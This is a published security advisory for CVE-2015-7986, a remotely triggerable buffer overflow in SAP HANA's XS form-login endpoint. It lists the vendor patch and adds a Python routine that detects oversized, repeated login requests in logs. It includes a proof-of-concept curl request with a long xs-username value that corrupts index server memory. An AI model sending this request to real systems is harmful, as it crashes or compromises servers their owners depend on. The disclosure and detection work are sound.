Application: SAP HANA
Versions Affected: SAP HANA 1.00.095
Vendor URL: http://www.sap.com
Bugs: RCE, Memory corruption
Vendor response: 18.07.2015
Date of Public Advisory: 13.10.2015
Reference: SAP Security Note 2197428
Authors: Mathieu Geli (ERPScan)
Class: Memory corruption, RCE
Impact: full system compromise
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-7986
CVSS Base Score: 9.3 / 10
CVSS Base Vector:
| AV: Access Vector (Related exploit range)                         | Network (N)  |
| AC: Access Complexity (Required attack complexity)                | Medium (M)   |
| Au: Authentication (Level of authentication needed to exploit)    | None (N)     |
| C: Impact to Confidentiality                                      | Complete (C) |
| I: Impact to Integrity                                            | Complete (C) |
| A: Impact to Availability                                         | Complete (C) |
An attacker can use a remote command execution vulnerability to execute commands remotely without authorization, under the privileges of the service that executes them. The attacker can access arbitrary files and directories located in the SAP server filesystem, including application source code, configuration, and critical system files. This allows obtaining critical technical and business-related information stored in a vulnerable SAP system.
A buffer overflow vulnerability exists in the SAP HANA interface. If an attacker has network access to the SQL interface or the SAP HANA Extended Application Services interface of an SAP HANA system, the vulnerability enables the attacker to inject code into working memory that is subsequently executed by the application. It can also be used to cause a general fault in the product, causing the product to terminate.
Proof of concept
This authentication request should be replayed 10 times.
curl -v -XPOST http://hana:8000/sap/hana/xs/formLogin/login.xscfunc -H 'Content-type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-csrf-token: unsafe' -d 'xs-username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
SAP HANA 1.00.095.00
Other versions are probably affected too, but they were not checked.
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2197428.
An anonymous attacker can use a special HTTP request to corrupt SAP HANA index server memory.
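Until the note is applied, the request pattern above (a POST to the formLogin endpoint with an abnormally long xs-username, repeated from one source) is simple to spot in web-tier logs. The following detection routine is an added example written for this advisory, not code from ERPScan or SAP; the 128-character threshold, the repeat count, the (src_ip, method, path, body) record layout and the sample traffic are all assumptions constructed for illustration.

```python
from urllib.parse import parse_qs
from collections import Counter

# Endpoint and form field named in the advisory's proof of concept.
LOGIN_PATH = "/sap/hana/xs/formLogin/login.xscfunc"
USERNAME_FIELD = "xs-username"
# Assumed threshold: legitimate HANA user names are short, so anything
# longer than this in the login form is treated as suspect.
MAX_USERNAME_LEN = 128

def oversized_login(path, body, max_len=MAX_USERNAME_LEN):
    """Return the xs-username length when a login POST carries an oversized
    value, or None when the request is not a suspicious login attempt."""
    if path != LOGIN_PATH:
        return None
    fields = parse_qs(body, keep_blank_values=True)
    names = fields.get(USERNAME_FIELD, [])
    longest = max((len(n) for n in names), default=0)
    return longest if longest > max_len else None

def flag_requests(records, max_len=MAX_USERNAME_LEN, repeat_threshold=3):
    """records: iterable of (src_ip, method, path, body) tuples (assumed
    layout). Returns (hits, repeat_offenders): hits lists every oversized
    login attempt; repeat_offenders lists sources that sent at least
    repeat_threshold of them, matching the replayed-request pattern."""
    hits = []
    per_source = Counter()
    for src, method, path, body in records:
        if method != "POST":
            continue
        n = oversized_login(path, body, max_len)
        if n is not None:
            hits.append((src, n))
            per_source[src] += 1
    repeat = sorted(src for src, c in per_source.items() if c >= repeat_threshold)
    return hits, repeat

# Constructed sample traffic (not real logs): one normal login, one unrelated
# GET, and four oversized login attempts replayed from a single host.
SAMPLE = [
    ("10.0.0.5", "POST", LOGIN_PATH, "xs-username=SYSTEM&xs-password=secret"),
    ("10.0.0.9", "GET", "/sap/hana/xs/formLogin/", ""),
] + [("198.51.100.7", "POST", LOGIN_PATH, "xs-username=" + "A" * 600)] * 4

if __name__ == "__main__":
    hits, repeat = flag_requests(SAMPLE)
    print("oversized login attempts:", hits)
    print("sources exceeding repeat threshold:", repeat)
```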
To prevent this issue as well as a plethora of other vulnerabilities that may affect your systems, ERPScan provides the following services: